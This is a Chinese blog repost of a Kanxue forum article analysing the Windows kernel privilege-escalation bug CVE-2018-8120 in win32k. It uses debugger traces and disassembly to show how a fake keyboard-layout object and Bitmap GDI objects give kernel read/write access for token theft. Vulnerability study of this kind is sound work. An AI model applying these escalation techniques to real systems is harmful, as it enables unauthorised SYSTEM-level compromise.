windows修改内存读写权限_Windows提权逆向

最新推荐文章于 2023-06-22 15:03:44 发布
最新推荐文章于 2023-06-22 15:03:44 发布
阅读量584 收藏
点赞数
文章标签: windows修改内存读写权限
2275e0cddd8fbc2d8d2babb5e207e67a.png 本文为看雪论坛优秀文章 看雪论坛作者ID: 东方二狗 目录

  • 01 Windows内核提权思路

  •          提权一

  •          提权二

  •          提权三

  • 02 成因

  • 03 利用

  • 04 逆向

  •          窗口站

  •          SetBitmap      

  •          总结

一个小白对于Windows提权以及逆向的学习,文章中说的思路可能有不对的,希望不要介意!!! 01 Windows内核提权思路 内核提权最终都是通过读写来做一些事情所有内核提权都是获取一个system值 从而获得最高权限。

>>>>

提权一

替换当前进程EPROCESS结构的token为system的token。

>>>>

提权二

替换当前进程EPROCESS结构体token所指向的数据。

>>>>

提权三

3环直接写shellcode是不行的因为当前 进程eprocess位于内核空间,要进行读写代码必须在0环中,如果在3环进行读写会出现保护异常。 用户层可以通过调用系统服务来访问内核层代码。 02 成因 win32k.sys 组件中创建窗口站对象(CreateWindowStationW)时候,SetImeInfoEx函数没有对指针进行安全验证; 对应指针指向零页内存,然后在它下一次使用之前有代码对该区域进行修改触发蓝屏。 03 利用 需要提权申请一块堆大小并且构造这块内存中的数据释放后指向shellcode位置,当提权完成后再恢复这块数据。 04 逆向 以2018-8120为例子进行傻瓜式分析开始啦, 前提需要进入当前进程所对应的内核空间。 
1: kd> !process 0 0 test.exe1: kd> .process /i 87b06c081: kd> g0: kd> .reload /f /user0: kd> .process
fed3d74f61e2032c59b38919cebcf4b7.png

>>>>

窗口站

窗口站是和当前进程和会话(session)相关联的一个内核对象,它包含剪贴板(clipboard)、原子表、一个或多个桌面(desktop)对象。 用户调用CreateWindowStation创建新的窗口站时,最终会调用内核函数xxxCreateWindowStation执行窗口站的创建,但是在该函数执行期间,被创建的新窗口站实例的spklList指针并没有被初始化,指向的是空地址。 a. HWINSTA hSta = CreateWindowStationW(0, 0, READ_CONTROL, 0); hSta 句柄=58,对应在内核中窗口站地址是87a85d48: 
001b:01246909 8bf4 mov esi,esp //001b:0124690b 6a00 push 0        //0001b:0124690d 6800000200      push 20000h //READ_CONTROL001b:01246912 6a00 push 0   //0001b:01246914 6a00 push 0   //0001b:01246916 ff1588522c01 call dword ptr [test!_imp__CreateWindowStationW (012c5288)]
ce3266f2d7437743c21ba0be39461441.png b. CreateBitmap getpvscsn0  下断点得到下边四个值 CreateBitmap 创建的句柄是 gManger=1205067e。 
001b:012469be 8bf4 mov esi,esp001b:012469c0 8d85d0fcffff lea eax,[ebp-330h] //002cf450 00000090001b:012469c6 50              push eax //eax=002cf450=buff001b:012469c7 6a20 push 20h001b:012469c9 6a01 push 1001b:012469cb 6a01 push 1001b:012469cd 6a60 push 60h001b:012469cf ff1504502c01 call    dword ptr [test!_imp__CreateBitmap (012c5004)]
同理所得: gWorker=180504e7 mpv=fe667038,wpv=fdab8368 
//堆栈变化
002c30e4 00000060
002c30e8 00000001
002c30ec 00000001
002c30f0 00000020
e1eef0edea80075583f48dd2f16903ae.png c. 自己申请一块空间的地址 构造tagkl(目标键盘布局)对象的结构体指针piiex指向的输入法信息对象的缓冲区。 
001b:01246a66 c78594fcffff00000000 mov dword ptr [ebp-36Ch],0    //002cf414 00000000 ==>P_tagKL pkl =0001b:01246a70 8b8594fcffff mov eax,dword ptr [ebp-36Ch] //eax=00000000==>pkl->hkl001b:01246a76 8b8da0fcffff mov ecx,dword ptr [ebp-360h] //ecx=fdab8368=wpv001b:01246a7c 894814          mov dword ptr [eax+14h],ecx //[eax+14]==>[0+14]==>pkl->hkl = (HKL__ *)wpv;001b:01246a7f 8b85acfcffff mov eax,dword ptr [ebp-354h]001b:01246a85 83e804 sub eax,4   //eax-4=eax=fe667034001b:01246a88 8b8d94fcffff mov ecx,dword ptr [ebp-36Ch] //002cf414 00000000 ==>ecx=00000000==>pkl001b:01246a8e 89412c mov dword ptr [ecx+2Ch],eax //eax=fe667034==>0000002c fe667034001b:01246a91 685c010000 push 15Ch001b:01246a96 8d8530fbffff lea eax,[ebp-4D0h]001b:01246a9c 50              push eax001b:01246a9d e816c7ffff call test!ILT+435(_RtlSecureZeroMemory) (012431b8)
自己申请内存地址初始化002cf2b0 =0xccc。 3521e2d6d5501373b2d9dcb08b0add3b.png 当触发漏洞时候: 002cf2b0变成自己构造的数值了具体汇编这里不做过多的介绍了。 19bc14fa202280991d8fe127a52f5fa3.png 下图书触发漏洞以及在申请的内存里面构造了自己需要的数据。 c6963c750a0d49d37a35d17949e6ff24.png dd2b78e17abd86fee9bf682d17d3ad46.png 验证自己找的gManger gWork等值是否正确。 30e99e593e878b3188d811411459c51f.png

>>>>

SetBitmap

a. Bitmap分析

思路: SetBitmapBits --> NtGdiSetBitmapBits --> GreSetBitmapBits --> bDoGetSetBitmapBits--> memcpy (1)setbitmap代码分析 SetBitmapBits((HBITMAP)gManger, sizeof(PVOID), &oaddr); 
001b:01246be5 8bf4 mov esi,esp001b:01246be7 8d850cfbffff lea eax,[ebp-4F4h] &oaddr001b:01246bed 50              push eax //eax=002cf28c001b:01246bee 6a04 push 4                            // 00000004 ==》sizeof001b:01246bf0 8b8dc4fcffff mov ecx,dword ptr [ebp-33Ch] //1205067e==》gManger001b:01246bf6 51              push ecx //push 1205067e001b:01246bf7 ff1508502c01 call dword ptr [test!_imp__SetBitmapBits (012c5008)]
NtGdiSetBitmapBits(int a1, SIZE_T Size, PVOID Address) b.  bp win32k!NtGdiSetBitmapBits下断点进行分析 v6 = GreSetBitmapBits(a1, Size, Address, &v4);进行分析。 
win32k!NtGdiSetBitmapBits+0x67:940d3b0b 8d45dc lea eax,[ebp-24h] 8c16abe8 8c16abfc940d3b0e 50              push eax //push 8c16abfc==>&v4 ==>8c16abfc 00000000 ==>0940d3b0f ff7510 push dword ptr [ebp+10h] //002cf28c ==> Address ==>002cf28c 83f6e3fc nt!HalDispatchTable+0x4940d3b12 ff750c push dword ptr [ebp+0Ch] //push 00000004 ==>sizeof940d3b15 ff7508 push dword ptr [ebp+8] //push 1205067e ==>gManger==>a1940d3b18 e8dbcf0800 call win32k!GreSetBitmapBits (94160af8)
c. bp win32k!bDoGetSetBitmapBits下断点进行分析 v9是算出来的计算公式如下: 3b6d2ee1277dda3488287a025e2f1267.png   5a28401d1caff369d09b478b4fdf2021.png 代码如下: 
win32k!GreSetBitmapBits+0x169:94160c61 53              push ebx94160c62 8d4d80 lea ecx,[ebp-80h] 8c16ab44 0000000094160c65 51              push ecx //8c16ab40 8c16ab54 ==>ecx=8c16ab54==>(struct _SURFOBJ *)&v12 ==> _SURFOBJ *a294160c66 50              push eax //8c16ab3c fe667018 ==>eax = fe667018 ==》v9=fdf6bd38 +20= FDF6BD58 =wpv ==> _SURFOBJ *a1/*
*/94160c67 e8a5000000 call win32k!bDoGetSetBitmapBits (94160d11)
v9计算过程gManager句柄的后3位,wpv+20位置。 6cbe949b42814876de49f315542b7b03.png a7b4ccb9388527e073c53989526bc109.png (1)由于漏洞中的memcpy大小不可控,所以回覆盖一部分的SURFOBJ成员,所以我们需要修复某些在Set/GetBitMapBits时所必须的成员 利用Bitmap内核对象中的pvScan0字段+10的位置系统API的GetBitmapBits和SetBitmapBits可以读写pvScan0所指向内存地址的内容。 (2)因此这个v9计算公式俩种。 d. 拷贝 
win32k!bDoGetSetBitmapBits+0x30a:9416101b c745fc05000000 mov dword ptr [ebp-4],5   8c16ab30 0000000594161022 53              push ebx ebx=0000000494161023 ff750c push dword ptr [ebp+0Ch] 8c16ab40 002cf28c ==>002cf28c==>002cf28c 83f6e3fc nt!HalDispatchTable+0x494161026 ff7508 push dword ptr [ebp+8] 8c16ab3c fdab8368 ==》fdab8368==》wpv
win32k!bDoGetSetBitmapBits+0x318:94161029 e87208ffff call    win32k!memcpy (941518a0) fdab8368 ==>wpv
2e264a3ff8576e07290abb2027339862.png

>>>>

总结

剩下的GetBitmapBits以及需要逆向的其他函数都是类似操作只要知道调用哪个函数就可以动态跟踪里面数据。 e81b3905b3628ada24de38b30a5a3833.gif - End - c07ace7d9385097440fbf3d68c808507.png

看雪ID:东方二狗

https://bbs.pediy.com/user-798435.htm 

*本文由看雪论坛  东方二狗  原创,转载请注明来自看雪社区

推荐文章++++

94120defdecc3fa5bff78c9ddc7ff4c6.png

* 动态过DSE代码以及原理

* ollvm源码分析 - Pass之SplitBaiscBlocks

* Linux内核驱动调试遇到的一些坑以及解决方法(新手必看指南)

* 记一起 kthroltlds 挖矿蠕虫变种分析

* Metasploit后门以及跨平台后门生成

进阶安全圈,不得不读的一本书 d505eb516f349ec21aa23d4cc8a938b2.png ﹀ ﹀ ﹀ 08508cc09087b45f497c783a5ebe878d.png 1a2414e2b93799d60b5c9169db1564f8.gif
weixin_39794213
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c#中用windows api函数修改内存数据
jinjazz
04-28 5155
这个问题来自伴水的《划拳机器人》,对本文用途感兴趣的朋友请大致阅读伴水的帖子,在帖子中我用这个方法写了剪刀五号,战绩不错,当然属于作弊的方法了。剪刀五号的思路就是每次出拳,尽量让对方能赢,然后根据一个地址段来扫描内存中对方所赢的局数的保存地址,找到后在得到比赛结果时把内存数据改掉。这个类似以前打单机游戏时用的fpe之类的修改工具。当然,如果对方故意犯规,一局也不赢,你是找不到他的地址的
进程注入之进程提权
WgpSec狼组安全团队
06-04 1152
本文作者:Gality 本文字数:7928字 阅读时长:20分钟 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 最近在研究进程注入相关的东西,主要是参考process-
windows修改内存读写权限_内存去哪了
weixin_39776787的博客
11-21 316
刚才回答了个问题,觉得回答不太完整,就写篇文章详细阐述下自己的想法。win10内存的利用规律是什么,为什么有些时候会自己回收内存?​www.zhihu.com内存买来就是拿来用的,所以内存被占满了,肯定是数据干的。那么具体是什么数据呢?我们先来给数据划分几种类型:1.有用数据,就是程序主动申请起来的数据。2.缓存数据,就是操作系统把文件读到内存里,当你访问文件的时候直接读内存就行了。先声明,缓存数...
内核修改内存读写权限
水墨画
12-20 1514
修改成可读写__asm { push eax mov eax, CR0 and eax, 0xFFFEFFFF mov CR0, eax pop eax }恢复__asm { push eax mov eax, CR0 or eax, NOT 0xFFFEFFFF mov CR0, eax pop eax }
windows修改内存读写权限_Linux进程间通信——内存共享映射
weixin_39996798的博客
10-21 296
一、概念什么是内存共享映射?将磁盘文件的一部分直接映射到内存中共享内存,就是两个或多个进程都可以访问的同一块内存空间,一个进程对这块空间内容的修改可为其他参与通信的进程所看到的映射种类共享映射(share),内存中数据修改时,磁盘对应也同时修改私有映射(private),内存中数据修改时,磁盘不修改内存共享特点实现进程间通信最简单也是最直接的方法就是共享内存——为参与通信的多个进程在内存中开辟一个...
初探——内存读写内核达到提权
Leon的博客
03-19 2535
起因:一个Ubuntu 16.04 提权漏洞的修复 漏洞概况: 这次的 EXP 在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。 非特权用户可以使用此漏洞获得权限提升。 漏洞重现 自己有很多Centos的服务器,唯一一台Ubuntu的还是4.4.0 -117的,所以向朋友借了一台服务器,刚刚好是4.3...
vc.rar_内存 读写_内存 驱动_驱动级 内存_驱动读写_驱动读写内存
09-22
这些知识不仅适用于驱动级内存读写,也是系统编程和逆向工程的基础。对于有兴趣深入研究操作系统内部运作或者从事相关开发工作的人员来说,这些都是必不可少的技能。在学习过程中,一定要注意遵循安全规范,避免对...
X64进程驱动读写_读写器_驱动程序
09-20
4. **权限控制**:理解Windows的安全模型,确保驱动程序在进行内存访问时遵循权限规则,防止权限滥用。 5. **异常处理**:当读写操作遇到错误或者异常时,需要有恰当的错误处理机制,避免系统崩溃。 6. **调试技巧...
精选_根据进程PID读写指定进程的内存数据_源码打包
03-08
综上所述,这个压缩包提供的源码很可能是一个实用工具,展示了如何在Windows环境中通过进程PID来读写指定进程的内存数据,涉及到了操作系统底层的编程技术,对于学习系统编程和逆向工程的开发者来说具有很高的参考...
易语言对64位程序内存读写操作纯模块源码
05-27
本主题聚焦于易语言在处理64位程序内存读写操作方面的应用,这对于理解底层数据处理、游戏修改、软件调试等领域非常重要。 在64位操作系统环境下,程序的内存管理与32位系统有很大不同。64位程序可以访问的内存地址...
内存读写拦截
10-05
硬件级别的内存读写拦截通常涉及到CPU的内存保护机制,如页表权限设置。通过修改页表项的权限,可以阻止对特定内存区域的读写操作。这种方式通常由操作系统内核实现,具有高效性和安全性,但需要相应的硬件支持。 ...
[提权] 使用 ShellCode 注入其他进程
LYSM
11-27 1023
背景 如果将shellcode注入到具有特定权限的进程中,使用 ShellCode 创建的进程就可以获得与该进程相同的权限。 本次使用的工具,依旧是上次编写的PETools: https://www.cnblogs.com/LyShark/p/12960816.html 提权降权工具下载地址: https://www.blib.cn/soft/pexec.zip 枚举系统进程,与进程权限令牌等。 #include <stdio.h> #include <Windows.h> #inc
提权技术之给任意进程提权(我们以OD,CE为例)
最新发布
a756598009的博客
06-22 906
赋予进程某种特殊权限 也叫提升读写权限 那么为什么要提升读写权限呢 如果我们想修改游戏内存数据 数字的话正常情况下我们无法进行跨进程内存读写 这时候就可以使用 提升自身辅助进程的权限 来达到能读写游戏内存的效果那提权的原理又是什么呢?游戏虽然做了自身的进程保护 不允许其他进程读写 但是我们电脑系统本身就是有系统自带的进程winlogon.exe 这进程为例,这个进程是可以随意读写游戏内存的 游戏的保护也会过滤掉系统进程对自身的读写
python3从零学习-5.8.4、mmap—内存映射文件支持
山海皆可平z
06-15 611
mmap — 内存映射文件支持 内存映射(mmap)文件对象的行为既像 bytearray 又像 文件对象。 你可以在大部分接受 bytearray 的地方使用 mmap 对象;例如,你可以使用 re 模块来搜索一个内存映射文件。 你也可以通过执行 obj[index] = 97 来修改单个字节,或者通过对切片赋值来修改一个子序列: obj[i1:i2] = b'...'。 你还可以在文件的当前位置开始读取和写入数据,并使用 seek() 前往另一个位置。 内存映射文件是由 mmap 构造函数.
10. 存取控制
showna的专栏
03-28 4114
 Microsoft Windows 2000提供了广泛且具高度弹性的安全功能,在现今市场上没有其他的作业系统能在安全对象上提供细微的控制。而Windows实作了 存取控制 部份,所以可以达到如此重要的程度。存取控制简介 一般来说,当人们提到「Windows安全性」,即是指实作Windows的 存取控制 部份。存取控制可以被解释为指派及强制可以或不可以在安全对象上执行某些动作。Wi
windows修改内存读写权限_Windows下网站目录777可读写权限设置方法
weixin_39922749的博客
11-05 2101
首先,我们打开文件根目录,比如D盘mingdengsoft这个文件夹,点击需要设置权限的文件夹,比如我们可以右击data文件夹,点属性上方的标签选第二个按键“安全”,然后选择中间的“添加”按键,在出现的新窗口中,选择左下角的“高级”,选择新跳出窗口右侧中部的“立即查找”键,在下方出现的搜索结果中,选择一个名称为“IUSR_”开头的项目,选中他后,点上方的确定,下面在点确定,这时就会回到一开始dat...
看雪学院-OllyDBG入门系列(四)内存写入 笔记
有被小窝
02-05 1256
看雪学院-OllyDBG入门系列(四)内存断点 笔记 原作地址:http://bbs.pediy.com/showthread.php?threadid=21378 作者:CCDebuger   在 OllyDBG 中一般我们用到的内存断点有内存访问和内存写入断点。内存访问断点就是指程序访问内存中我们指定的内存地址时中断,内存写入断点就是指程序往我们指定的内存地址中写东西时中断。 内存
windows修改内存读写权限_如何理解虚拟内存
weixin_39692557的博客
11-21 580
为什么不直接使用物理内存 虚拟内存是计算机系统内存管理的一种技术。它使得应用程序认为它拥有连续可用的内存(一个连续完整的地址空间),而实际上,它通常是被分隔成多个物理内存碎片,还有部分暂时存储在外部磁盘存储器上,在需要时进行数据交换。 现代所有用于一般应用的操作系统都对普通的应用程序使用虚拟内存技术,老一些的操作系统,如DOS和1980年代的Windows,或者那些1960年代的大型机,一般都没有...
WDM驱动程序开发之应用程序测试篇CreateFile,ReadFile,WriteFile,DeviceIoControl,CloseHandle.
03-21 5042
 一、*****CreateFile*****    这个函数可以创建或打开一个对象的句柄,凭借此句柄就可以控制这些对象:控制台对象、通信资源对象、目录对象(只能打开)、磁盘设备对象、文件对象、邮槽对象、管道对象。    函数原型:HANDLE CreateFile(  LPCTSTR lpFileName,                         // file name对象路径名  D
windows修改文件读写权限
06-02
Windows修改文件或目录的读写权限,可以按照以下步骤进行: 1. 找到需要修改权限的文件或目录,右键点击该文件或目录,选择“属性”选项。 2. 在弹出的属性窗口中,选择“安全”选项卡。 3. 在“安全”选项卡中,可以看到当前文件或目录的权限设置。点击“编辑”按钮,进入权限编辑界面。 4. 在权限编辑界面中,可以选择添加或删除用户或用户组,并设置相应的权限。 5. 在设置完权限后,点击“确定”按钮保存设置,即可完成文件或目录权限修改。 需要注意的是,修改文件或目录权限需要具有管理员权限或拥有相应的权限。如果你没有权限修改文件或目录的权限,需要联系管理员或拥有权限的用户进行修改
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值